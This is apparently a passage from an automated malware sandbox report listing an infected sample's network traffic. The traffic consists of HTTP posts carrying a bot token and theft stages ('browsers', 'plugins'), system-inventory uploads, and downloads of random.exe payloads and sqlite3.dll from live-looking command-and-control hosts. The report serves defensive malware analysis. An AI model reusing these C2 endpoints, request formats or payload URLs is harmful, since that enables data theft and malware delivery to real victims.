6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="hwid"2285F3CB45684217651120------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="build"kira------DAECFIJDAAAKECBFCGHI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="message"browsers------JDAFBKECAKFCAAAKJDAK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDBHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 2d 2d 0d 0a Data Ascii: ------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="message"plugins------IDHIDBAEGIIIDHJKEGDB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDGHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 2d 2d 0d 0a Data Ascii: ------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="message"fplugins------ECBGHCGCBKFIECBFHIDG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAKHost: 185.215.113.115Content-Length: 5887Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 35 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017588001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.115Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 35 38 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017589001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/martin1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBHost: 185.215.113.115Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 2d 2d 0d 0a Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"db796f16d102ac7e6fa57b878d381d4b8b2ccaa9369a700a0e6694ec18136f53f550eb0e------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="file"------AAKKFHCFIECAAAKEGCFI--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 35 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017590001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 38 37 37 42 34 35 31 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32877B45182D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /files/notfinancing/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /ZhnSMEmOyBahvsfTCosA1738232489 HTTP/1.1Host: home.fivegg5th.topAccept: /Content-Type: application/jsonContent-Length: 549932Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 36 33 30 36 31 33 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 2
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 36 32 31 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1062149001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /ZhnSMEmOyBahvsfTCosA1738232489?argument=0 HTTP/1.1Host: home.fivegg5th.topAccept: /
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAEHost: 185.215.113.115Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 37 39 36 66 31 36 64 31 30 32 61 63 37 65 36 66 61 35 37 62 38 37 38 64 33 38 31 64 34 62 38 62 32 63 63 61 61 39 33 36 39 61 37 30 30 61 30 65 36 36 39 34 65 63 31 38 31 33 36 66 35 33 66 35 35 30 65 62 30 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 